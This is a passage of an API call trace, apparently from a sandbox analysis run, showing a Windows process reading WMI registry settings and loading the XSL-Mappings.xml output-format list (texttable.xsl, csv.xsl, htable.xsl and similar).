(param_1="IDENTIFY") returned 0x8 [0160.763] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.763] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.763] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.764] SysStringLen (param_1="IMPERSONATE") returned 0xb [0160.764] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.764] SysStringLen (param_1="IMPERSONATE") returned 0xb [0160.764] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.764] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.764] SysStringLen (param_1="IMPERSONATE") returned 0xb [0160.764] SysStringLen (param_1="DELEGATE") returned 0x8 [0160.764] SysStringLen (param_1="IDENTIFY") returned 0x8 [0160.764] SysStringLen (param_1="DELEGATE") returned 0x8 [0160.764] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.764] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0160.764] SysStringLen (param_1="DELEGATE") returned 0x8 [0160.764] SysStringLen (param_1="NONE") returned 0x4 [0160.764] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.764] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.764] SysStringLen (param_1="NONE") returned 0x4 [0160.765] SysStringLen (param_1="CONNECT") returned 0x7 [0160.765] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.765] SysStringLen (param_1="CALL") returned 0x4 [0160.765] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.765] SysStringLen (param_1="CALL") returned 0x4 [0160.765] SysStringLen (param_1="CONNECT") returned 0x7 [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="NONE") returned 0x4 [0160.766] SysStringLen (param_1="NONE") returned 0x4 [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] 
SysStringLen (param_1="NONE") returned 0x4 [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0160.766] SysStringLen (param_1="DEFAULT") returned 0x7 [0160.766] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0160.766] SysStringLen (param_1="PKT") returned 0x3 [0160.766] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0160.766] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0160.767] GetSystemDirectoryW (in: lpBuffer=0x472c98, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0160.767] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0160.767] SysStringLen (param_1="\\wbem\\") returned 0x6 [0160.767] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0160.767] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0160.767] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0160.767] GetCurrentThreadId () returned 0xf7c [0160.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xcf8c8 | out: phkResult=0xcf8c8*=0xf4) returned 0x0 [0160.768] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xcf8d4, lpcbData=0xcf8d0*=0x400 | out: lpType=0x0, lpData=0xcf8d4*=0x30, lpcbData=0xcf8d0*=0x4) returned 0x0 [0160.768] _wcsicmp (_String1="0", _String2="1") returned -1 [0160.768] _wcsicmp (_String1="0", _String2="2") returned -2 [0160.768] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xcf8d0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xcf8d0*=0x42) returned 
0x0 [0160.768] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x472ce0, lpcbData=0xcf8d0*=0x42 | out: lpType=0x0, lpData=0x472ce0*=0x25, lpcbData=0xcf8d0*=0x42) returned 0x0 [0160.768] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0160.768] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0160.768] RegQueryValueExW (in: hKey=0xf4, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xcf8d4, lpcbData=0xcf8d0*=0x400 | out: lpType=0x0, lpData=0xcf8d4*=0x36, lpcbData=0xcf8d0*=0xc) returned 0x0 [0160.768] _wtol (_String="65536") returned 65536 [0160.768] RegCloseKey (hKey=0x0) returned 0x6 [0160.768] CoCreateInstance (in: rclsid=0x876d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x876d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xcfd64 | out: ppv=0xcfd64*=0x674630) returned 0x0 [0163.281] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x674630, xmlSource=0xcfce8*(varType=0x8, wReserved1=0xffff, wReserved2=0x6570, wReserved3=0x7728, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xcfd4c | out: isSuccessful=0xcfd4c*=0xffff) returned 0x0 [0169.419] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x674630, DOMElement=0xcfd60 | out: DOMElement=0xcfd60*=0x678c58) returned 0x0 [0169.429] IXMLDOMElement:getElementsByTagName (in: This=0x678c58, tagName="XSLFORMAT", resultList=0xcfd5c | out: resultList=0xcfd5c*=0x678e80) returned 0x0 [0169.430] IXMLDOMNodeList:get_length (in: This=0x678e80, listLength=0xcfd44 | out: listLength=0xcfd44*=21) returned 0x0 [0169.430] IXMLDOMNodeList:get_item (in: This=0x678e80, index=0, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) 
returned 0x0 [0169.431] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.431] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.431] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.432] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0169.432] IUnknown:Release (This=0x674b20) returned 0x0 [0169.432] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.432] IUnknown:Release (This=0x678c98) returned 0x0 [0169.432] IXMLDOMNodeList:get_item (in: This=0x678e80, index=1, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.433] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="textvaluelist.xsl") returned 0x0 [0169.433] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.433] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.433] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0169.433] SysStringLen (param_1="VALUE") returned 0x5 [0169.433] SysStringLen (param_1="TABLE") returned 0x5 [0169.434] SysStringLen (param_1="TABLE") returned 0x5 [0169.434] SysStringLen (param_1="VALUE") returned 0x5 [0169.434] IUnknown:Release (This=0x674b20) returned 0x0 [0169.434] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.434] IUnknown:Release (This=0x678c98) returned 0x0 [0169.434] IXMLDOMNodeList:get_item (in: This=0x678e80, index=2, listItem=0xcfd78 | out: 
listItem=0xcfd78*=0x674b20) returned 0x0 [0169.434] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="textvaluelist.xsl") returned 0x0 [0169.434] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.435] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.435] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="LIST", varVal2=0x0)) returned 0x0 [0169.435] SysStringLen (param_1="LIST") returned 0x4 [0169.435] SysStringLen (param_1="TABLE") returned 0x5 [0169.436] IUnknown:Release (This=0x674b20) returned 0x0 [0169.436] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.436] IUnknown:Release (This=0x678c98) returned 0x0 [0169.436] IXMLDOMNodeList:get_item (in: This=0x678e80, index=3, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.436] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="rawxml.xsl") returned 0x0 [0169.436] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.436] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.436] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0169.437] SysStringLen (param_1="RAWXML") returned 0x6 [0169.437] SysStringLen (param_1="TABLE") returned 0x5 [0169.437] SysStringLen (param_1="RAWXML") returned 0x6 [0169.437] SysStringLen (param_1="LIST") returned 0x4 [0169.437] SysStringLen (param_1="LIST") returned 0x4 [0169.437] SysStringLen (param_1="RAWXML") returned 0x6 [0169.437] 
IUnknown:Release (This=0x674b20) returned 0x0 [0169.437] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.437] IUnknown:Release (This=0x678c98) returned 0x0 [0169.437] IXMLDOMNodeList:get_item (in: This=0x678e80, index=4, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.437] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="htable.xsl") returned 0x0 [0169.437] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.438] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.438] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0169.438] SysStringLen (param_1="HTABLE") returned 0x6 [0169.438] SysStringLen (param_1="TABLE") returned 0x5 [0169.438] SysStringLen (param_1="HTABLE") returned 0x6 [0169.438] SysStringLen (param_1="LIST") returned 0x4 [0169.438] IUnknown:Release (This=0x674b20) returned 0x0 [0169.438] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.439] IUnknown:Release (This=0x678c98) returned 0x0 [0169.439] IXMLDOMNodeList:get_item (in: This=0x678e80, index=5, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.439] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="hform.xsl") returned 0x0 [0169.439] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.439] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.439] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="HFORM", varVal2=0x0)) returned 0x0 
[0169.439] SysStringLen (param_1="HFORM") returned 0x5 [0169.440] SysStringLen (param_1="TABLE") returned 0x5 [0169.440] SysStringLen (param_1="HFORM") returned 0x5 [0169.440] SysStringLen (param_1="LIST") returned 0x4 [0169.440] SysStringLen (param_1="HFORM") returned 0x5 [0169.440] SysStringLen (param_1="HTABLE") returned 0x6 [0169.440] IUnknown:Release (This=0x674b20) returned 0x0 [0169.440] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.440] IUnknown:Release (This=0x678c98) returned 0x0 [0169.440] IXMLDOMNodeList:get_item (in: This=0x678e80, index=6, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.440] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="xml.xsl") returned 0x0 [0169.440] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.440] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.441] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="XML", varVal2=0x0)) returned 0x0 [0169.441] SysStringLen (param_1="XML") returned 0x3 [0169.441] SysStringLen (param_1="TABLE") returned 0x5 [0169.442] SysStringLen (param_1="XML") returned 0x3 [0169.442] SysStringLen (param_1="VALUE") returned 0x5 [0169.442] SysStringLen (param_1="VALUE") returned 0x5 [0169.442] SysStringLen (param_1="XML") returned 0x3 [0169.442] IUnknown:Release (This=0x674b20) returned 0x0 [0169.442] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.442] IUnknown:Release (This=0x678c98) returned 0x0 [0169.442] IXMLDOMNodeList:get_item (in: This=0x678e80, index=7, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.442] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="mof.xsl") returned 0x0 [0169.442] IXMLDOMNode:get_attributes (in: 
This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.442] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.443] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="MOF", varVal2=0x0)) returned 0x0 [0169.443] SysStringLen (param_1="MOF") returned 0x3 [0169.443] SysStringLen (param_1="TABLE") returned 0x5 [0169.443] SysStringLen (param_1="MOF") returned 0x3 [0169.443] SysStringLen (param_1="LIST") returned 0x4 [0169.443] SysStringLen (param_1="MOF") returned 0x3 [0169.443] SysStringLen (param_1="RAWXML") returned 0x6 [0169.443] SysStringLen (param_1="LIST") returned 0x4 [0169.443] SysStringLen (param_1="MOF") returned 0x3 [0169.444] IUnknown:Release (This=0x674b20) returned 0x0 [0169.444] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.444] IUnknown:Release (This=0x678c98) returned 0x0 [0169.444] IXMLDOMNodeList:get_item (in: This=0x678e80, index=8, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.444] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="csv.xsl") returned 0x0 [0169.444] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.444] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.444] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="CSV", varVal2=0x0)) returned 0x0 [0169.444] SysStringLen (param_1="CSV") returned 0x3 [0169.444] SysStringLen (param_1="TABLE") returned 0x5 [0169.445] SysStringLen (param_1="CSV") returned 0x3 [0169.445] SysStringLen (param_1="LIST") returned 0x4 [0169.445] SysStringLen 
(param_1="CSV") returned 0x3 [0169.445] SysStringLen (param_1="HTABLE") returned 0x6 [0169.445] SysStringLen (param_1="CSV") returned 0x3 [0169.445] SysStringLen (param_1="HFORM") returned 0x5 [0169.445] IUnknown:Release (This=0x674b20) returned 0x0 [0169.445] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.445] IUnknown:Release (This=0x678c98) returned 0x0 [0169.445] IXMLDOMNodeList:get_item (in: This=0x678e80, index=9, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.445] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.445] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.445] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.446] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0169.446] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.446] SysStringLen (param_1="TABLE") returned 0x5 [0169.446] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.446] SysStringLen (param_1="VALUE") returned 0x5 [0169.446] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.446] SysStringLen (param_1="XML") returned 0x3 [0169.446] SysStringLen (param_1="XML") returned 0x3 [0169.446] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.446] IUnknown:Release (This=0x674b20) returned 0x0 [0169.446] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.446] IUnknown:Release (This=0x678c98) returned 0x0 [0169.446] IXMLDOMNodeList:get_item (in: This=0x678e80, index=10, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.447] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") 
returned 0x0 [0169.447] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.447] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.447] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0169.447] SysStringLen (param_1="texttablewsys") returned 0xd [0169.447] SysStringLen (param_1="TABLE") returned 0x5 [0169.447] SysStringLen (param_1="texttablewsys") returned 0xd [0169.447] SysStringLen (param_1="XML") returned 0x3 [0169.447] SysStringLen (param_1="texttablewsys") returned 0xd [0169.447] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.447] SysStringLen (param_1="XML") returned 0x3 [0169.447] SysStringLen (param_1="texttablewsys") returned 0xd [0169.448] IUnknown:Release (This=0x674b20) returned 0x0 [0169.448] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.448] IUnknown:Release (This=0x678c98) returned 0x0 [0169.448] IXMLDOMNodeList:get_item (in: This=0x678e80, index=11, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.448] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.448] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.448] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.449] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0169.449] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.449] SysStringLen 
(param_1="TABLE") returned 0x5 [0169.449] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.449] SysStringLen (param_1="XML") returned 0x3 [0169.449] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.449] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.449] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.449] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.450] IUnknown:Release (This=0x674b20) returned 0x0 [0169.450] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.450] IUnknown:Release (This=0x678c98) returned 0x0 [0169.450] IXMLDOMNodeList:get_item (in: This=0x678e80, index=12, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.450] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.450] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.450] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.450] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] SysStringLen (param_1="TABLE") returned 0x5 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] SysStringLen (param_1="XML") returned 0x3 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0169.451] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.451] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.451] SysStringLen (param_1="wmiclitableformat") returned 
0x11 [0169.451] IUnknown:Release (This=0x674b20) returned 0x0 [0169.451] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.451] IUnknown:Release (This=0x678c98) returned 0x0 [0169.451] IXMLDOMNodeList:get_item (in: This=0x678e80, index=13, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.452] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.452] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.452] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.452] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0169.452] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.452] SysStringLen (param_1="TABLE") returned 0x5 [0169.452] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.452] SysStringLen (param_1="XML") returned 0x3 [0169.452] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.452] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.453] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.453] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.453] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.453] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.454] IUnknown:Release (This=0x674b20) returned 0x0 [0169.454] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.454] IUnknown:Release (This=0x678c98) returned 0x0 [0169.454] IXMLDOMNodeList:get_item (in: This=0x678e80, index=14, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.454] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | 
out: text=0xcfd80*="texttable.xsl") returned 0x0 [0169.454] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.455] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, name="KEYWORD", namedItem=0xcfd70 | out: namedItem=0xcfd70*=0x678c98) returned 0x0 [0169.455] IXMLDOMNode:get_nodeValue (in: This=0x678c98, value=0xcfd1c | out: value=0xcfd1c*(varType=0x8, wReserved1=0x47, wReserved2=0x2cb0, wReserved3=0x47, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="TABLE") returned 0x5 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="XML") returned 0x3 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.455] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0169.455] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0169.455] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0169.456] IUnknown:Release (This=0x674b20) returned 0x0 [0169.456] IUnknown:Release (This=0x678cf8) returned 0x0 [0169.456] IUnknown:Release (This=0x678c98) returned 0x0 [0169.456] IXMLDOMNodeList:get_item (in: This=0x678e80, index=15, listItem=0xcfd78 | out: listItem=0xcfd78*=0x674b20) returned 0x0 [0169.456] IXMLDOMNode:get_text (in: This=0x674b20, text=0xcfd80 | out: text=0xcfd80*="htable.xsl") returned 0x0 [0169.456] IXMLDOMNode:get_attributes (in: This=0x674b20, attributeMap=0xcfd74 | out: attributeMap=0xcfd74*=0x678cf8) returned 0x0 [0169.456] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x678cf8, 
